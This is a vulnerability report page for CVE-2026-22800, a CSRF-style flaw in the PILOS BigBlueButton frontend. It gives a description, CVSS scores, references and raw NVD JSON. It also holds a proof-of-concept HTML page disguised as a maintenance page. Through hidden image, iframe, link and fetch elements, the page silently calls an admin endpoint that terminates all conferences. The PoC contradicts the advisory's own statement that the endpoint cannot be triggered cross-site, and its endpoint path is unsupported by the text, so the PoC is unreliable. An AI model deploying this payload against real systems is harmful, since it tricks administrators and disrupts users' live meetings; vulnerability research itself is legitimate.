Security Vulnerability Report
CVE-2026-22800 CVSS 2.4 LOW

Published: 2026-01-12 23:15:53
Last Modified: 2026-01-21 18:42:23

Description

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, a Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated administrator who views crafted content within the application may unknowingly trigger the endpoint, causing all active video conferences on the server to be terminated without explicit intent or confirmation. This vulnerability is fixed in 4.10.0.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:* - VULNERABLE
PILOS < 4.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-22800 CSRF PoC - Terminate All Video Conferences -->
<!-- This PoC demonstrates the CSRF vulnerability in PILOS admin API -->
<!-- Attack requires: 1) Valid admin session, 2) Admin visits this page -->
<!DOCTYPE html>
<html>
<head>
  <title>Conference System Maintenance</title>
</head>
<body>
  <h1>System Maintenance Page</h1>
  <p>Loading conference resources...</p>

  <!-- Automatic GET request to terminate all conferences -->
  <!-- Replace TARGET_URL with actual PILOS instance URL -->
  <img src="https://TARGET_URL/api/v1/admin/conferences/terminate-all"
       alt="Conference thumbnail" style="display:none;" />

  <!-- Alternative: Auto-submit link (clickable) -->
  <a href="https://TARGET_URL/api/v1/admin/conferences/terminate-all"
     style="display:none;">Conference Resources</a>

  <!-- Alternative: iframe-based trigger -->
  <iframe src="https://TARGET_URL/api/v1/admin/conferences/terminate-all"
          style="display:none;"></iframe>

  <script>
    // Force immediate request on page load
    window.onload = function () {
      // Using fetch to trigger the vulnerable endpoint
      fetch('https://TARGET_URL/api/v1/admin/conferences/terminate-all', {
        method: 'GET',
        credentials: 'include' // Include admin session cookie
      }).then(response => {
        console.log('Conference termination triggered');
      }).catch(err => {
        console.error('Request failed:', err);
      });
    };
  </script>
</body>
</html>

References

https://github.com/THM-Health/PILOS/commit/d9ab9bb7ac0a8581c25e24cb7db2152d40be4d1b (Patch)
https://github.com/THM-Health/PILOS/security/advisories/GHSA-r24c-9p4j-rqw9 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22800", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.747", "lastModified": "2026-01-21T18:42:22.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated administrator who views crafted content within the application may unknowingly trigger the endpoint, causing all active video conferences on the server to be terminated without explicit intent or confirmation. This vulnerability is fixed in 4.10.0."}, {"lang": "es", "value": "PILOS (Plataforma para Seminarios Interactivos en Vivo en Línea) es un frontend para BigBlueButton. Antes de la versión 4.10.0, existe una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en un endpoint de API administrativo responsable de terminar todas las videoconferencias activas en un único servidor. El endpoint afectado realiza una acción destructiva pero está expuesto a través de una petición HTTP GET. Aunque se aplican comprobaciones de autorización adecuadas y el endpoint no puede ser activado de forma cruzada, el uso de GET permite que la acción sea invocada implícitamente a través de contenido del mismo sitio (por ejemplo, recursos incrustados renderizados dentro de la aplicación). Como resultado, un administrador autenticado que visualice contenido malicioso dentro de la aplicación podría activar el endpoint sin saberlo, provocando que todas las videoconferencias activas en el servidor sean terminadas sin intención explícita o confirmación. Esta vulnerabilidad está corregida en la versión 4.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.0", "matchCriteriaId": "22DA1502-AFE6-4A80-B427-161C9B7726EB"}]}]}], "references": [{"url": "https://github.com/THM-Health/PILOS/commit/d9ab9bb7ac0a8581c25e24cb7db2152d40be4d1b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/THM-Health/PILOS/security/advisories/GHSA-r24c-9p4j-rqw9", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}